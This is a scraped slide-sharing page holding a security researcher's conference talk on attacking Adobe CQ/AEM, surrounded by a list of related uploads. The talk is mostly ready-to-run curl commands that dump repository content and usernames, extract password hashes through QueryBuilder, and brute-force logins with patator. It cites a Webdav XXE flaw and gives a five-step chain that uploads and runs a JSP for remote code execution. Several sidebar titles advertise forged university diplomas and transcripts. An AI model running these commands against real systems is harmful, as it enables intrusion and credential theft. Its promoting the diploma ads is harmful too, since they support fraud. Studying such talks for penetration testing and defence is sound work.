APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
harveenkaur52
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
CIOWomenMagazine
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
Javier Lasa
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
Danica Gill
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
Rogerio Filho
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
GTProductions1
 

Recently uploaded (20)

一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
 

Доклад Михаила Егорова на PHDays

  • 2. • Mikhail Egorov • Security researcher • Works in Odin (Parallels) • 0ang3el (at) gma1l (d0t) com Who is that guy?
  • 3. • http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ • http://www.slideshare.net/CQCON/prsentation-ben-zahler • https://docs.adobe.com/docs/en/aem/6-0/administer/security/security- checklist.html Related Work
  • 4. • Sensitive information from JCR • Installed OSGI bundles • Custom scripts • Usernames • Password hashes • Elements that allow anonymous modification What do we want
  • 5. • Use JsonRendererServlet Sensitive information from JCR curl -X “GET” http://127.0.0.1:8080/.json curl -X “GET” http://127.0.0.1:8080/.6.json curl -X “GET” http://127.0.0.1:8080/.tidy.6.json curl -X “GET” http://127.0.0.1:8080/.tidy.infinity.json
  • 6. • List of all bundles • QueryBuilder is your friend! http://docs.adobe.com/docs/en/cq/5-6-1/dam/customizing_and_extendingcq5dam/query_builder.html Installed OSGI bundles curl -X “GET” http://127.0.0.1:8080/bin.tidy.infinity.json curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json
  • 7. • List customs scripts • List compiled custom scripts from cache Custom scripts curl -X “GET” http://127.0.0.1:8080/apps.tidy.infinity.json curl -X “GET” http://127.0.0.1:8080/var/classes.tidy.infinity.json
  • 8. • Dump content node properties • Use regular expression to extract usernames (pipe with prev command) Usernames curl -X “GET” http://127.0.0.1:8080/content.infinity.json python -c 'import sys,re; print "n".join([m.group(1) for m in re.finditer("".+?By":"(.+?)"",sys.stdin.readlines()[0])])' | sort –u
  • 9. • Use QueryBuilder bundle Password hashes curl -X “GET” http://127.0.0.1:8080/bin/querybuilder.json?type=rep:User&p.hits=sel ective&p.properties=rep:principalName%20rep:password&p.limit=100
  • 10. • Dump content node properties • Use regular expression to check (pipe with prev command) Anonymous modification curl -X “GET” http://127.0.0.1:8080/content.infinity.json python -c 'import sys,re; m = re.search("".+?By":"anonymous"",sys.stdin.readlines()[0]); print "Anon modification: ","Yes" if m else "No"'
  • 11. • Try default user credentials: admin/admin, author/author, anonymous/anonymous • Offline attack (brute hashes) • Online attack (POST servlet bundle) Getting access patator http_fuzz url=http://127.0.0.1:8080/content/fake.json method=POST user_pass=FILE0:FILE1 0=users.txt 1=pass.txt auth_type=basic -x ignore:code!=200 --threads 5
  • 12. • XSS • CSRF • DoS • Read local files • RCE You have access, now what? Not covered, sorry!
  • 13. • CVE-2015-1833 ( http://seclists.org/oss-sec/2015/q2/518 ) • Webdav OSGI bundle uses XML parser that is not properly initialized • Exploit - https://www.exploit-db.com/exploits/37110/ Webdav bundle, XXE
  • 14. • Out-of-bound exploitation http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html • Pros: works with anonymous credentials • Cons: you need external server, instable • Inbound exploitation • Pros: you do not need external server, more stable • Cons: you need credentials of the user that is able to modify some node in JCR Webdav bundle, XXE
  • 16. • We have node – http://127.0.0.1:8080/rce • We have script exec.jsp that is magically loaded into node – http://127.0.0.1:8080/apps/rcetype • When someone navigates to http://127.0.0.1:8080/rce.exec our exec.jsp will be executed. Remote code execution {"jcr:createdBy":"admin","jcr:created":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:folder","exec.jsp":{"jcr:createdBy":"admin","jcr:crea ted":"Sun May 03 2015 21:24:38 GMT+0300","jcr:primaryType":"nt:file"}} {"sling:resourceType":"rcetype","jcr:primaryType":"nt:unstructured"}
  • 17. • Step I: Create rcetype node Remote code execution curl –u admin:admin –Fjcr:primaryType=nt:folder http://127.0.0.1:8080/content/rcetype
  • 18. • Step II: Upload script exec.jsp to rcetype node Remote code execution curl –u admin:admin –Fexec.jsp=@RCE.jsp http://127.0.0.1:8080/content/rcetype
  • 19. • Step III: Copy rcetype to /apps Remote code execution curl –u admin:admin –F:operation=copy –F:dest=/apps/rcetype http://127.0.0.1:8080/content/rcetype
  • 20. • Step IV: Create rce node bound to rcetype Remote code execution curl –u admin:admin –Fsling:resourceType=rcetype http://127.0.0.1:8080/content/rce
  • 21. • Step V: Launch jsp script Remote code execution curl –X “GET” http://127.0.0.1:8080/content/rce.exec